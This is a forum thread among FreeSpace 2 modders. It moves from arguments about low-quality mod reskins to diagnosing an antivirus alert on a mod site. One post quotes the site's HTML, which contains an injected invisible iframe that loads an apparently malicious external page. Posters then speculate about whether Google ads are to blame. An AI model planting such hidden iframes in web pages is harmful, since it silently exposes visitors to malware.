Which ones are the "crappy reskins"?
The Hades one is actually...decent. (it has shine and glow maps as well if you extract it...somehow)

Ugh... Couldn't you just put in a section for those table hacks, and move them all there?

I could have, but it would be quicker to extract the ship.tbl from the .vp and make it yourself.

At least make a section for the crappy reskins and put them there. It could be someone's begining of the journey through the path of FS2 modding.

Er, whatever. Just instead of deleting them put them in a special section for all the people who begin to mod.

The majority of them were the crappy things made in 1999.

I didn't know we could have had 2048x2048 TGA textures with shine, glow and normal maps in 1999 ?

Uh...if you mean by "begining of the journey through the path of FS2 modding" adding "player ship" to the flags and doing nothing else...uhh, well, that's not a really good start. Sure, I mean you could do it, but there's no need to share it because everyone and their grandma can do that.

Avast! for home reports something as well.

Code: [Select]
File name: http://freespacemods.net/news.php\{gzip}
Malware name: HTML:Iframe-inf
Malware type: Virus/Worm
VPS version: 090912-0, 12.09.2009

Considering the Google's information, I'd say the problem lies here:

Code: [Select]
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script><iframe src="http://reycross.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe></td></tr></table><table style='width:100%' cellspacing='3'><tr><td style='width:20%;'></td><td style='width:60%;'><img src='/e107_themes/e107v4a/images/blank.gif' width='1' height='1' alt='' /></td><td style='width:20%;'></td></tr><tr><td style='width:20%; vertical-align: top;'>

http://reycross.com/lib/index.php triggers the same anti-virus warning and Google reports the following of the site:

    * If you are the owner of this website, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Centre.

My conclusion:

CALL GOOGLE AND TELL THEM TO GET THIS OUT OF THEIR ADS.

EDIT: The issue has been reported, but it remains to be seen how fast Google reacts if at all.

EDIT2: In further inspection, it seems it isn't in fact the google ads; the script ends before the offending iframe entry on the news.php starts. Now I feel like a tool. :rolleyes:

Yes. That was my response too, after going  :eek: and before :wtf:.

It makes no sense that they don't cross-reference the databases of reported malware sites with the sitest that are advertised by AdSense. Or if they do they should do it more often.

EDIT: I still feel like a tool. :ick:

Funny how my site contains stuff on Freespace and I use Google ads, yet I don't get strange blocks like that.

Not all google ads use the same ad lists, FreeSpaceMods just happened to get a malware site.

Who knows how many similar sites are marketing themselves through google ads. Although it could, hypothetically, be a case of trojan actually having infected the Google Ads of FreeSpaceMods to show a malware site, rather than Google AdSense actually having the malware site on their lists...

Any idea when google's going to fix the problem?
